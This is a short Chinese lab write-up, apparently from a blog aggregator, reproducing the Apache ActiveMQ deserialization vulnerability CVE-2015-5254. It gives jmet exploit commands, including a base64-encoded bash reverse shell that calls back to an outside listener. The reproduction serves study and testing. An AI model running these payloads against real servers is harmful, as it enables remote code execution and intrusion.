ActiveMQ反序列化漏洞(CVE-2015-5254)复现
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ActiveMQ反序列化漏洞(CVE-2015-5254)复现相关的知识,希望对你有一定的参考价值。
简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。1.首先在kali里面执行以下命令:
cd var/opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
2.输入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616
注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口
3.现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息
4.点击消息可触发命令执行
5.然后使用反弹shell的命令输入:java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616
前面是输入自己的IP后进行的编码 后面是输入被***者的IP
6.执行完以后会出现一个序号 然后再主页里面触发 在进行监听就可以了
以上是关于ActiveMQ反序列化漏洞(CVE-2015-5254)复现的主要内容,如果未能解决你的问题,请参考以下文章
ActiveMQ反序列化漏洞(CVE-2015-5254)复现
ActiveMQ反序列化漏洞(CVE-2015-5254)复现
漏洞复现 - ActiveMQ反序列化漏洞(CVE-2015-5254)